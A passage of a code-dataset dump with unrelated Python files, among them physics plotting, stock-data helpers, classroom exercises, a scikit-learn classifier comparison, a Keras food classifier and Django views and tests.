else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_sf_debug_%s.pdf\"%(args.tag,chan))\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_sf[args.year+\"_trigsf_\"+chan+\"_up\"],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(np.reshape(arr_sf_up[chan]-arr_sf[chan],(len(x_bins[chan])-1,len(y_bins[chan])-1))[j,i]) if eff_hists_mc_int[chan][0][j,i]>0. else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_sf_debug_up_%s.pdf\"%(args.tag,chan))\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_sf[args.year+\"_trigsf_\"+chan+\"_down\"],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(np.reshape(arr_sf_down[chan]-arr_sf[chan],(len(x_bins[chan])-1,len(y_bins[chan])-1))[j,i]) if eff_hists_mc_int[chan][1][j,i]>0. else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_sf_debug_down_%s.pdf\"%(args.tag,chan))\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_eff_data[chan],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(eff_hists_data[chan][j,i]) if eff_hists_data[chan][j,i]>0. else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_eff_data_debug_%s.pdf\"%(args.tag,chan))\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_eff_mc[chan],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(eff_hists_mc[chan][j,i]) if eff_hists_mc[chan][j,i]>0. 
else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_eff_mc_debug_%s.pdf\"%(args.tag,chan))\n \n print(h_trig_sf)\n save(h_trig_sf,\"%s_%s.coffea\"%(args.output,args.year))\n","sub_path":"test/make_trig_eff.py","file_name":"make_trig_eff.py","file_ext":"py","file_size_in_byte":18869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"242815031","text":"import pandas as pd\nimport numpy as np\nimport quandl\nimport os\nimport math\nimport matplotlib.pyplot as plt\nimport datetime\nfrom stockstats import StockDataFrame\n\ndirectory = \"stock_data\"\n\ndef download_data(stocks, usestockstats=True):\n # if directory does not exist, create & download the data\n stock_items = list()\n #stock_items = [\"WIKI/INTC\", \"WIKI/QCOM\", \"WIKI/NVDA\", \"WIKI/TXN\", \"WIKI/BRCM\", \"WIKI/AAPL\"]\n for item in stocks:\n stock_items += [\"WIKI/\"+item]\n if not os.path.exists(directory):\n os.makedirs(directory)\n for item in stock_items:\n fileName = os.path.join(directory, item[5:]+\".csv\")\n if os.path.exists(fileName):\n continue\n data = quandl.get(item)\n final_data = data.copy()\n if (usestockstats == True):\n stock_df = StockDataFrame.retype(data)\n final_data['RSI'] = stock_df['rsi_14']\n final_data['StocOsci'] = stock_df['kdjj']\n final_data['ADMI'] = stock_df['adx']\n final_data['VVR'] = stock_df['vr']\n final_data['SMA'] = stock_df['adj. close_14_sma']\n \n with open(fileName, 'w+') as f:\n final_data.to_csv(f)\n\ndef get_stocks_df_by_column(stocks, columnName = 'Adj. Close', dateFrom = '2006-01-01'):\n stock_info_df = pd.DataFrame()\n for stock_id in stocks:\n fileName = os.path.join(directory, stock_id +\".csv\")\n if not os.path.exists(fileName):\n print(\"get_stocks_dataframe: Missing {} data\".format(stock_id))\n continue\n stock_dat = pd.read_csv(fileName, index_col= [0], header=0, parse_dates=[1])\n frame = stock_dat[[columnName]]\n frame.columns = [stock_id]\n stock_info_df = pd.concat([stock_info_df, frame], axis=1)\n\n info = stock_info_df.loc[dateFrom:]\n return info\n\ndef get_stock_dataframe(stockName, dateFrom = '2006-01-01'):\n fileName = os.path.join(directory, stockName + \".csv\")\n stock_data = pd.read_csv(fileName, index_col= [0], header=0, parse_dates=[1])\n stock_data['Open'] = stock_data.Open.astype(float)\n stock_data.drop(['Ex-Dividend', 'Split Ratio', 'Open', 'High', 'Close', 'Low', 'Volume'], axis=1, inplace=True)\n return stock_data.loc[dateFrom:]\n\ndef get_datetime_from_str(date_str):\n return datetime.datetime.strptime(date_str, '%Y-%m-%d')\n\ndef get_gap_in_months(start_date, end_date):\n return (end_date.year - start_date.year) * 12 + end_date.month - start_date.month\n\ndef plot_graph(ax, test_dates, prediction, actual, title=\"Title goes here\"):\n print(\"Test dates start {} end {}\".format(test_dates[0], test_dates[-1]))\n start_date = get_datetime_from_str(test_dates[0])\n end_date = get_datetime_from_str(test_dates[-1])\n num_months = get_gap_in_months(start_date, end_date)\n #print(num_months)\n\n ax.set_title(title)\n ax.set_xticklabels('')\n #ax.set_xticks([datetime.date(start_year+int(i/12),1+i%12,1) for i in range(num_months)])\n ax.set_xticks([datetime.date(start_date.year+int(i),1,1) for i in range(1+int(num_months/12))])\n ax.set_xticklabels([datetime.date(start_date.year+int(i),1,1).strftime('%Y') for i in range(1+int(num_months/12)+1)])\n ax.plot(test_dates.astype(datetime.datetime), prediction, 'r-', label = 'predicted')\n 
ax.plot(test_dates.astype(datetime.datetime), actual, 'g-.', label = 'actual')\n ax.legend(loc='upper right', shadow=True).get_frame().set_facecolor('0.8')\n","sub_path":"capstone_support.py","file_name":"capstone_support.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563748332","text":"\"\"\"Lovelace04_PartC.py\"\"\"\r\n\"\"\"Licensed Under the MIT License: CHECK IN REPO: https://github.com/Rongmario/FoP-T1-Assignment-2020\"\"\"\r\n\r\n__author__ = \"Rongmario\"\r\n\r\ndef main(expression: str): # Expects user's input in the function (string)\r\n if len(expression) == 0:\r\n return \"Empty string.\" # Output when user's input is empty\r\n first = expression[0]\r\n splits, signs = [first], {'+', '-', '*'} # Use tuple unpacking to assign variables\r\n if not first.isdigit() or not expression[-1].isdigit():\r\n return \"Invalid expression.\" # Output when first character is anything other than a number\r\n for i in expression[1:]: # Start the loop from second character\r\n if i.isdigit():\r\n if splits[-1] == '*':\r\n splits.append(i) # When last index of list is *, we append new element\r\n else:\r\n splits[-1] += i # If current character is a digit, add it onto the last element of list\r\n elif i in signs:\r\n if splits[-1] in signs:\r\n return \"Invalid expression.\" # Not allowed signs to be next to each other\r\n else:\r\n splits.append(i) # If current character is any of the signs, we append a new element onto the list\r\n else:\r\n return \"Invalid expression.\"\r\n j = 0 # Counter\r\n while j < len(splits):\r\n if splits[j] == '*':\r\n splits[j - 1] = int(splits[j - 1]) * int(splits[j + 1]) # Multiply left, right hand of the multiply index\r\n del splits[j: j + 2] # Delete multiply index and right hand index, result is stored on left hand\r\n else:\r\n j += 1 # Otherwise increment counter if no multiply sign is found\r\n # Sum of all elements in the list, we use list comprehension here to convert all elements with type 'str' to 'int'\r\n return sum([int(x) for x in splits])\r\n\r\n\r\nuser_input = input(\"Please enter an arithmetic expression: \")\r\nresult = main(user_input)\r\nif type(result) == int:\r\n # Format is used here so I can put a full-stop straight after the variable without having a space dividing it\r\n print(\"The result is {0}.\\nGoodbye.\".format(result))\r\nelse:\r\n print(result)\r\n","sub_path":"Lovelace04_PartC.py","file_name":"Lovelace04_PartC.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"41352494","text":"'''\nInput: an integer\nReturns: an integer\n'''\ndef eating_cookies(n):\n if n < 0:\n return 0\n if n == 0:\n return 1\n\n else:\n return eating_cookies(n-1) + eating_cookies(n-2) + eating_cookies(n-3)\nif __name__ == \"__main__\":\n # Use the main function here to test out your implementation\n num_cookies = 5\n\n print(f\"There are {eating_cookies(num_cookies)} ways for Cookie Monster to each {num_cookies} cookies\")\n\n\n# UPER\n\n## Understand, Plan, Execute , Reflect\n\n\"\"\"\n# given a number\n# how many ways can you reach 0 from that number\n\n# example : given 3\n# (given 3) - 1 - 1 - 1 = 0\n# (given 3) - 2 - 1 = 0\n# (given 3) - 1 - 2 = 0\n# (given 3) - 3 = 0\n# you can reach 0 in 4 ways given 3\n\n### To Understand\n# Re-phrase the problem.\n\"\"\"\n\n# Make sure to fully grasp what is being asked\n# If you understand what success looks like, 
you understand the problem\n\n\n### To Plan\n# Gather info nonstop\n# get rid of repeat info \n\"\"\"\nThis question is asking for permutations.\n\nGiven a number (n)\n\n\n\"\"\"\n### Execute\n# Execute the plan!\n\n### Reflect on the results of the execution\n\n\n","sub_path":"eating_cookies/eating_cookies.py","file_name":"eating_cookies.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"196416466","text":"import numpy as np\nimport torch\n\n\nclass Rings:\n def __init__(self, n_mixtures, ring_radius=10, std=1., device=\"cpu\", seed=2019):\n self.n_mixtures = n_mixtures\n self.ring_radius = ring_radius\n self.std = std\n self.device = torch.device(device)\n torch.manual_seed(seed)\n\n self.centers_x = []\n self.centers_y = []\n delta_theta = 2 * np.pi / self.n_mixtures\n for i in range(self.n_mixtures):\n self.centers_x.append(10 * np.cos(i * delta_theta))\n self.centers_y.append(10 * np.sin(i * delta_theta))\n self.centers_x = np.expand_dims(np.array(self.centers_x), 1)\n self.centers_y = np.expand_dims(np.array(self.centers_y), 1)\n self.centers = np.concatenate([self.centers_x, self.centers_y], 1)\n\n self.centers = torch.from_numpy(self.centers)\n self.p = torch.full(size=(self.n_mixtures,), fill_value=(1./self.n_mixtures), device=self.device)\n\n def get_sample(self, size):\n ith_center = torch.multinomial(self.p, num_samples=size, replacement=True)\n sample_centers = self.centers[ith_center, :]\n std = torch.full_like(sample_centers, self.std)\n sample_points = torch.normal(mean=sample_centers, std=std).to(self.device, dtype=torch.float)\n return sample_points\n\n def get_test(self):\n return self.get_sample(10000)\n","sub_path":"__archived/dataloader/rings.py","file_name":"rings.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"128799045","text":"import pandas as pd\nimport numpy as np\nimport random\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import tree\nfrom sklearn.metrics import roc_curve, auc, confusion_matrix, classification_report\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score\nimport graphviz \n\n\n\nfilename = 'h2p5data.csv'\ndata = pd.read_csv(filename)\nrow_index = data.index.tolist()\nfeature_list = list(data)[1:-1]\n\nfolders = []\nfor i in range(1, 6):\n temp = []\n for j in row_index:\n #print(j)\n Id = j + 1\n if Id % 5 == i-1:\n temp.append(j)\n\n folders.append(temp)\n\n\nprint(\"5-fold CV Result of Naive Bayes Classifier:\")\n\nNB_actual_class = []\nNB_predicted_class = []\nfor idx, folder in enumerate(folders):\n folderID = idx + 1\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n\n gnb = GaussianNB()\n for i in row_index:\n if i not in folder:\n x_train.append(data.loc[row_index[i], feature_list])\n y_train.append(data.loc[row_index[i], 'Class'])\n else:\n x_test.append(data.loc[row_index[i], feature_list])\n y_test.append(data.loc[row_index[i], 'Class'])\n\n model = gnb.fit(x_train, y_train)\n y_pred = model.predict(x_test)\n NB_actual_class.extend(y_test)\n NB_predicted_class.extend(y_pred)\n print(\"---Print Probabilities---\")\n print(model.predict_proba(x_test))\n \n\nDT_actual_class = []\nDT_predicted_class = []\nfor idx, folder in enumerate(folders):\n folderID = idx + 1\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n\n clf = tree.DecisionTreeClassifier()\n for i in row_index:\n if i not in 
folder:\n x_train.append(data.loc[row_index[i], feature_list])\n y_train.append(data.loc[row_index[i], 'Class'])\n else:\n x_test.append(data.loc[row_index[i], feature_list])\n y_test.append(data.loc[row_index[i], 'Class'])\n\n model = clf.fit(x_train, y_train)\n y_pred = model.predict(x_test)\n DT_actual_class.extend(y_test)\n DT_predicted_class.extend(y_pred)\n #Visualize\n dot_data = tree.export_graphviz(clf, out_file=None, \n feature_names=feature_list, \n class_names=target_names, \n filled=True, rounded=True, \n special_characters=True) \n graph = graphviz.Source(dot_data) \n print(\"--Tree--\")\n print(\"See Tree\"+str(idx)+\".pdf\")\n graph.render(\"Tree\"+str(idx))\n \n \n#NB Metrics\nprint(\"confusion_matrix\")\nprint(confusion_matrix(NB_actual_class, NB_predicted_class, labels=[1, 0]))\n#yes = 1; no = 0\ntarget_names = ['1','0']\nprint(classification_report(NB_actual_class, NB_predicted_class, target_names=target_names))\nprint(\"NB Accuracy: \")\nprint(accuracy_score(NB_actual_class, NB_predicted_class))\n\n\n\nprint(\"5-fold CV Result of Decision Tree Classifier:\")\n#DT Metrics\nprint(\"confusion_matrix\")\nprint(confusion_matrix(DT_actual_class, DT_predicted_class, labels=[1, 0]))\ntarget_names = ['1','0']\nprint(classification_report(DT_actual_class, DT_predicted_class, target_names=target_names))\nprint(\"DT Accuracy: \")\nprint(accuracy_score(DT_actual_class, DT_predicted_class))\n\n\n# Final Training on the whole dataset\nprint(\"Final Training on the whole dataset\")\n\nfilename = 'h2p5data.csv'\ndata = pd.read_csv(filename)\nx_data = []\ny_data = []\n\ngnb2 = GaussianNB()\n \nx_data = data.loc[:, feature_list]\ny_data = data.loc[:, 'Class']\n \nmodel = gnb2.fit(x_data, y_data)\n\n\nfinal_predicted_class = model.predict(x_data)\nfinal_actual_class = y_data \n \n#NB Metrics\nprint(\"confusion_matrix\")\nprint(confusion_matrix(final_actual_class, final_predicted_class, labels=[1, 0]))\ntarget_names = ['1','0']\nprint(classification_report(final_actual_class, final_predicted_class, target_names=target_names))\nprint(\"Accuracy: \")\nprint(accuracy_score(final_actual_class, final_predicted_class))\nprint(\"---Print Probabilities---\")\nprint(model.predict_proba(x_data))","sub_path":"hw2p5.py","file_name":"hw2p5.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22136459","text":"from django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\n\nfrom articlemanager.forms import ItemTypeForm\nfrom base.models import ItemType\n\n\n@login_required\ndef overview(request):\n items = ItemType.objects.all()\n return render(request, \"overview.html\", locals())\n\n\n@login_required\ndef update(request, article_id):\n item = get_object_or_404(ItemType, pk=article_id)\n items = ItemType.objects.all()\n\n if request.method == 'POST':\n form = ItemTypeForm(request.POST, instance=item)\n\n if form.is_valid():\n item = form.save()\n return HttpResponseRedirect('/articles/{id}'.format(id=item.id))\n else:\n form = ItemTypeForm(instance=item)\n\n return render(request, \"update.html\", locals())\n\n\n@login_required\ndef delete(request, article_id):\n item = get_object_or_404(ItemType, pk=article_id)\n item.delete()\n\n return HttpResponseRedirect('/articles/')\n\n\n@login_required\ndef create(request):\n items = ItemType.objects.all()\n\n if request.method == 'POST':\n form = 
ItemTypeForm(request.POST)\n if form.is_valid():\n item = form.save()\n return HttpResponseRedirect('/articles/{id}'.format(id=item.id))\n else:\n form = ItemTypeForm()\n\n return render(request, \"create.html\", locals())","sub_path":"articlemanager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"619397287","text":"import os\nimport sys\nimport math\nimport matplotlib.pyplot as pl\nfrom mpl_toolkits import mplot3d\nimport numpy as np\nimport time as tm\nimport random\nfrom functions import *\nfrom constants import *\n'''\nParameters needed: \nma, mb, mp, radius_a, radius_b, radius_p, a_s, a_p, per_s, per_p, \ne_s, e_p, i_s, i_p, Omega_s, Omega_p, w_s, w_p, M0_s, M0_p\n\nOmega_s = 0\nParameters to generate: \nmu, radius_a, radius_b, radius_p, a_s, e_s, e_p, i_s, i_p, Omega_p, w_s, w_p, M0_s, M0_p\n\nOther parameters to specify: \nn_periods, res, tol\n\nmu: [0,0.5]\nradius_a (Rsun): [,]\nradius_b (Rsun): [,]\nradius_p (Rjup): [0.25,1.05]\na_s (AU): [0.0836,0.22882]\ne_s: [0.023,0.521]\ne_p: [0.007,0.411]\ni_s (deg): [87,93]\ni_p (deg): [87,93]\nOmega_p (deg): [-2,2]\nw_s (deg): [,]\nw_p (deg): [,]\nM0_s (deg): [0,360]\nM0_p (deg): [0,360]\n'''\ndef datain(grid=10):\n\tmass_a = np.linspace(0.6897, 1.47, grid)\n\tmass_b = np.linspace(0.1951, 1.0208, grid)\n\tradius_a = np.linspace(0.6489, 1.79, grid)\n\tradius_b = np.linspace(0.2143, 1.0927, grid)\n\tradius_p = np.linspace(0.25, 1.05, grid)\n\ta_s = np.linspace(0.0836, 0.22882, grid)\n\te_s = np.linspace(0.023,0.521,grid)\n\te_p = np.linspace(0.007,0.411,grid)\n\ti_s = np.linspace(87,93,grid)\n\ti_p = np.linspace(87,93,grid)\n\tOmega_p = np.linspace(-2,2,grid)\n\tw_s = np.linspace(0,359,grid)\n\tw_p = np.linspace(0,359,grid)\n\tM0_s = np.linspace(0,359,grid)\n\tM0_p = np.linspace(0,359,grid)\n\n\tmass_a *= MSUN_KG\n\tmass_b *= MSUN_KG\n\tradius_a *= RSUN_M\n\tradius_b *= RSUN_M\n\tradius_p *= RJUPITER_M\n\ta_s *= AU_M\n\ti_s *= math.pi/180\n\ti_p *= math.pi/180\n\tOmega_p *= math.pi/180\n\tw_s *= math.pi/180\n\tw_p *= math.pi/180\n\tM0_s *= math.pi/180\n\tM0_p *= math.pi/180\n\tdata_out = (mass_a, mass_b, radius_a, radius_b, radius_p, a_s, e_s, e_p, i_s, i_p, Omega_p, w_s, w_p, M0_s, M0_p)\n\treturn data_out\n\ngrid = 10\ndata = datain(grid)\nprint(data)\nx=0\nfor i in range (0,10):\n\tprint(x)","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"524903384","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\n\nclass FoodClassifier:\n #Class Attributes:\n #model - the underlying keras model\n #labels - the labels to be associated with the activation of each output neuron. \n #Labels must be the same size as the output layer of the neural network. 
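For example, a model whose final softmax layer has 3 units needs exactly 3 labels, e.g. ['pizza','salad','soup'] (illustrative names).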
\n \n \n def __init__(self, modelpath, labels, min_confidence = 0.6):\n from keras.models import load_model\n from keras.applications.resnet50 import ResNet50\n self.resnet = ResNet50(include_top=False,weights='imagenet',pooling='max',input_shape=(224,224,3))\n self.extModel = load_model(modelpath)\n \n if(isinstance(labels,str)):\n #it's a file path\n from os.path import exists\n if(exists(labels)):\n f = open(labels,'r')\n x = f.readlines()\n y = []\n for i in x:\n y.append(i.split('\\n')[0])\n self.labels = y\n else:\n self.labels = labels\n \n self.num_classes = len(self.labels)\n self.min_confidence=min_confidence\n \n \n def predict(self,img):\n import os\n from PIL import Image\n from keras.preprocessing.image import img_to_array\n import numpy as np \n #check if image is a filepath\n if(isinstance(img,str)):\n if(not os.path.exists(img)):\n print(\"Error: Invalid File Path\")\n return \"\"\n else:\n #if its a filepath, convert to PIL image\n img = Image.open(img)\n \n #resize image\n #shape from model input\n shape = self.resnet.input_shape\n imgr = img.resize(shape[1:3])\n \n x = img_to_array(imgr).reshape((1,shape[1],shape[2],shape[3]))\n \n \n #predict\n features = self.resnet.predict(x)\n prediction = self.extModel.predict(features)\n \n #get max of predictions and return label(s)\n predIdx = np.argmax(prediction)\n if(prediction[0,predIdx] < self.min_confidence):\n return \"\" #no label when the best score is below the confidence threshold\n return self.labels[predIdx]\n unique_gabor_heights = set(map(lambda x: x.shape.rows, self._gabor_filters))\n if len(unique_gabor_heights) > 1:\n raise RuntimeError(\"uncoordinated gabor filters\")\n\n unique_gabor_widths = set(map(lambda x: x.shape.columns, self._gabor_filters))\n if len(unique_gabor_widths) > 1:\n raise RuntimeError(\"uncoordinated gabor filters\")\n\n gabor_width = list(unique_gabor_widths)[0]\n gabor_height = list(unique_gabor_heights)[0]\n if gabor_height > self._image_shape.rows or gabor_width > self._image_shape.columns:\n raise RuntimeError(\"too wide gabor filters\")\n\n if self._image_shape.rows < self._gabor_pooling_kernel_shape.rows:\n raise RuntimeError(\"gabor_pooling_layer_kernel_shape height is too long\")\n\n if self._image_shape.rows % self._gabor_pooling_kernel_shape.rows != 0:\n raise RuntimeError(\"image_shape height is not divisible by gabor_pooling_layer_kernel_shape height\")\n\n if self._image_shape.columns < self._gabor_pooling_kernel_shape.columns:\n raise RuntimeError(\"gabor_pooling_layer_kernel_shape width is too long\")\n\n if self._image_shape.columns % self._gabor_pooling_kernel_shape.columns != 0:\n raise RuntimeError(\"image_shape width is not divisible by gabor_pooling_layer_kernel_shape width\")\n\n if self._complex_layer_kernel_shape.rows % 2 == 0 or self._complex_layer_kernel_shape.columns % 2 == 0:\n raise RuntimeError(\"complex_layer_kernel_shape width and height must be odd\")\n\n gabor_pooling_layer_maps_height = self._image_shape.rows / self._gabor_pooling_kernel_shape.rows\n if self._complex_layer_kernel_shape.rows > gabor_pooling_layer_maps_height:\n raise RuntimeError(\"complex_layer_kernel_shape height is too long\")\n\n gabor_pooling_layer_maps_width = self._image_shape.columns / self._gabor_pooling_kernel_shape.columns\n if self._complex_layer_kernel_shape.columns > gabor_pooling_layer_maps_width:\n raise RuntimeError(\"complex_layer_kernel_shape width is too long\")\n\n def _check_types(self):\n if type(self._image_shape) is not Shape:\n raise RuntimeError(\"image_shape must be an instance of Shape\")\n\n if type(self._gabor_filters) is not list:\n raise RuntimeError(\"gabor_filters must be a list\")\n\n for gabor_parameters in self._gabor_filters:\n if type(gabor_parameters) is not GaborParameters:\n raise
RuntimeError(\"gabor_filters must be a list of GaborParameters\")\n\n if type(gabor_parameters.shape) is not Shape:\n raise RuntimeError(\"GaborParameters.shape must be an instance of Shape\")\n\n if type(self._gabor_pooling_kernel_shape) is not Shape:\n raise RuntimeError(\"gabor_pooling_layer_kernel_shape must be an instance of Shape\")\n\n if type(self._complex_layer_kernel_shape) is not Shape:\n raise RuntimeError(\"complex_layer_kernel_shape must be an instance of Shape\")\n\n def _get_gabor_pooling_layer_maps_shape(self):\n return Shape(\n rows=int(self._image_shape.rows / self._gabor_pooling_kernel_shape.rows),\n columns=int(self._image_shape.columns / self._gabor_pooling_kernel_shape.columns)\n )\n","sub_path":"myneuralnetwork/mnn_builder.py","file_name":"mnn_builder.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"35485818","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\n\nfrom django_functest import FuncBaseMixin, Upload\nfrom django_functest.exceptions import (\n SeleniumCantUseElement, WebTestCantUseElement, WebTestMultipleElementsException, WebTestNoSuchElementException\n)\nfrom django_functest.tests.models import Thing\n\nfrom .base import ChromeBase, FirefoxBase, PhantomJSBase, WebTestBase\n\ntry:\n from django.urls import reverse\nexcept ImportError:\n from django.core.urlresolvers import reverse\n\n\nclass TestCommonBase(FuncBaseMixin):\n def setUp(self):\n super(TestCommonBase, self).setUp()\n self.thing = Thing.objects.create(name=\"Rock\",\n big=True,\n clever=False,\n element_type=Thing.ELEMENT_EARTH,\n category=Thing.CATEGORY_MAGMA,\n count=1,\n description=\"Hard thing\")\n\n def test_get_url(self):\n self.get_url('admin:login')\n url = self.current_url\n self.assertTrue(url.endswith(\"/admin/login/\"))\n self.assertTrue(url.startswith(\"http://\"))\n\n def test_get_literal_url(self):\n url = reverse('admin:login')\n self.get_literal_url(url)\n self.assertUrlsEqual(url)\n\n def test_get_literal_url_with_full_url(self):\n url = reverse('admin:login')\n self.get_literal_url(url)\n # Specifically check this idiom for refreshing a page:\n self.get_literal_url(self.current_url)\n self.assertUrlsEqual(url)\n\n def test_assertUrlsEqual_default(self):\n self.get_url('admin:login')\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"foo\"))\n self.assertUrlsEqual(\"/admin/login/\")\n\n def test_assertUrlsEqual_path(self):\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"/login/\", \"/admin/login/\"))\n self.assertUrlsEqual(\"/login/\", \"/login/\")\n\n def test_assertUrlsEqual_query(self):\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"/foo/?q=1\", \"/foo/\"))\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"/foo/?q=1\", \"/foo/?q=2\"))\n self.assertUrlsEqual(\"/foo/?q=1\", \"/foo/?q=1\")\n\n def test_assertUrlsEqual_host(self):\n self.assertUrlsEqual(\"/foo/\", \"//example.com/foo/\")\n self.assertUrlsEqual(\"//example.com/foo/\", \"//example.com/foo/\")\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"//example.com/foo/\",\n \"//other.com/foo/\"))\n\n def test_assertUrlsEqual_protocol(self):\n self.assertUrlsEqual(\"http://example.com/foo/\", \"//example.com/foo/\")\n self.assertUrlsEqual(\"http://example.com/foo/\", \"http://example.com/foo/\")\n 
self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"http://example.com/foo/\",\n \"https://example.com/foo/\"))\n\n def test_assertTextPresent(self):\n self.get_url('django_functest.test_misc')\n self.assertTextPresent(\"Hello world\")\n # Check escaping\n self.assertTextPresent(\"from 'me' & \\\"friends\\\"\")\n self.assertTextPresent(\"\"\"It's also allowed to have \"quotes\" without escaping in text in valid HTML\"\"\")\n\n self.assertRaises(AssertionError, lambda: self.assertTextPresent(\"Something definitely not there\"))\n\n def test_assertTextAbsent(self):\n self.get_url('django_functest.test_misc')\n self.assertTextAbsent(\"Something definitely not there\")\n self.assertRaises(AssertionError, lambda: self.assertTextAbsent(\"Hello world\"))\n self.assertRaises(AssertionError, lambda: self.assertTextAbsent(\"from 'me' & \\\"friends\\\"\"))\n self.assertRaises(AssertionError, lambda: self.assertTextAbsent(\"\"\"It's also allowed to have \"quotes\" \"\"\"\n \"\"\"without escaping in text in valid HTML\"\"\"))\n\n def test_current_url(self):\n self.get_url('admin:login')\n # Check it really is a full URL\n self.assertTrue(self.current_url.startswith('http'))\n\n def test_is_element_present(self):\n self.get_url('admin:login')\n self.assertTrue(self.is_element_present('#id_username'))\n self.assertFalse(self.is_element_present('#id_something_not_there'))\n\n def refresh_thing(self):\n self.thing = Thing.objects.get(id=self.thing.id)\n return self.thing\n\n def test_fill(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill({'#id_name': \"New name\",\n '#id_big': False,\n '#id_clever': True,\n '#id_element_type': Thing.ELEMENT_AIR,\n '#id_category_1': Thing.CATEGORY_QUASIGROUP,\n '#id_count': 5,\n '#id_description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_fill_by_id(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill_by_id({'id_name': \"New name\",\n 'id_big': False,\n 'id_clever': True,\n 'id_element_type': Thing.ELEMENT_AIR,\n 'id_category_1': Thing.CATEGORY_QUASIGROUP,\n 'id_count': 5,\n 'id_description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_fill_by_name(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill_by_name({'name': \"New name\",\n 'big': False,\n 'clever': True,\n 'element_type': Thing.ELEMENT_AIR,\n 'category': Thing.CATEGORY_QUASIGROUP,\n 'count': 5,\n 'description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_fill_by_text(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill_by_text({'#id_element_type': 'Water'})\n self.submit('input[name=change]')\n self.refresh_thing()\n self.assertEqual(self.thing.element_type,\n Thing.ELEMENT_WATER)\n\n def test_fill_by_text_missing(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(self.TextNotFoundException, lambda: self.fill_by_text({'#id_element_type': 'Plasma'}))\n\n def test_fill_by_text_for_unsupported(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(self.ElementUnusableException, lambda: self.fill_by_text({'#id_count': 'Water'}))\n\n def _assertThingChanged(self):\n thing = 